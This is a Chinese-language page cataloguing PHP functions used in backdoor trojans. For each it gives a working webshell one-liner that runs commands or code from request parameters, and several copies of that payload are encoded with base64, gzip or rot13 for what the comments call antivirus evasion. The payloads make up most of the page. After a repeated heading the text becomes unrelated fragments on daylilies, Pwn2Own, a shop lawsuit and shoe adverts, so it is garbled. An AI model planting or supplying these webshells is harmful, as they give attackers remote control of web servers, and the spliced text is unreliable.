php后门木马常用的函数大致上可分为四种类型:
1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open
2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
4. .htaccess: SetHandler, auto_prepend_file, auto_append_file
1. 执行系统命令:
system 函数
//test.php?cmd=ls
system($_GET[cmd]);
passthru 函数
//test.php?cmd=ls
passthru($_GET[cmd]);
shell_exec 函数
//test.php?cmd=ls
echo shell_exec($_GET[cmd]);
exec 函数
//test.php?cmd=ls
$arr = array();
exec($_GET[cmd],$arr);
print_r($arr);
popen 函数
//test.php?cmd=ls
$handle = popen('$_GET[cmd], 'r');
$read = fread($handle, 2096);
echo $read;
pclose($handle);
proc_open 函数
//test.php?cmd=ls
$descriptorspec = array(
0 => array('pipe', 'r'),
1 => array('pipe', 'w'),
2 => array('pipe', 'w'),
);
$proc = @proc_open($_GET[cmd], $descriptorspec, $pipes);
fclose($pipes[0]);
$output = array();
while (!feof($pipes[1])) array_push($output, rtrim(fgets($pipes[1],1024),"\n"));
print_r($output);
2. 代码执行与加密:
eval 函数
//最常见的一句话木马
eval($_POST[cmd]);
base64_decode 函数
//为了免杀及隐藏而加密代码
//密文: eval($_POST['cmd']);
eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));
gzinflate 函数
//为了免杀及隐藏而加密代码
//密文: eval($_POST['cmd']);
eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==')));
gzuncompress 函数
//为了免杀及隐藏而加密代码
//密文: eval($_POST['cmd']);
eval(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==')));
gzdecode 函数
//为了免杀及隐藏而加密代码
//密文: eval($_POST['cmd']);
eval(gzdecode(base64_decode('H4sIAAAAAAAAA0stS8zRUIkP8A8OiVZPzk1Rj9W0BgA5YQfAFAAAAA==')));
str_rot13 函数
//为了免杀及隐藏而加密代码
//密文: eval($_POST[cmd]);
eval(str_rot13('riny($_CBFG[pzq]);'));
assert 函数
//类似eval函数
assert($_POST[cmd]);
call_user_func 函数
//使用call_user_func调用assert
call_user_func('assert',$_POST[cmd]);
call_user_func 函数
黄花菜是我们常说的忘忧草,常常被用来制作各种美食,黄花菜的功效与作用都有哪些?下面我们一起来看一下。 黄花菜,又名岐女、忘忧、宜男、疗愁花、真筋菜、金菜、条参、绿葱根,学名叫萱草,中国古代常用萱...
在一场事先知道攻击目标的顶尖黑客大赛上,如果一个目标安然无恙,有两个可能的原因:第一,太难了,大家没准备好。第二,事先准备的漏洞和攻击手段因为厂商提前补漏,没戏了。 对移动 Pwn2Own 这...
8月8日,湖北武汉。李先生将35万购买的新商铺出租给一家商业管理公司。最近,他带中介到现场准备卖掉商铺,发现商铺正被改造成公共厕所,里边安装了七八个便池,中介转身就走了。该公司承认改造违反了租约且未征...
描述以下部分供给了有关每个歹意域的更多详细信息:该安排运营着世界级的金融报文网络,各国银行和其他金融组织经过其供给的安全、标准化和可信的通道与同行交流报文,然后完结金融交易。 除此之外,SWIFT还向...
显高显腿长!同样轻盈单只只有250克!韦恩品牌正品保证!! 让你一穿难忘!!!就是这么牛B的舒适感! 是好东西永远不会过时,何况经典款。CHAO级强的工艺和用料,JIN口牛皮作为表面材质,...
本文导读目录: 1、黑客无间道txt全集下载 2、《名侦探柯南》最全能的五位角色都是谁? 3、买了辆新车,本来想安装一个智能后视镜的,朋友说,智能后视镜安装要改装汽车,有安全隐患,是真的么?...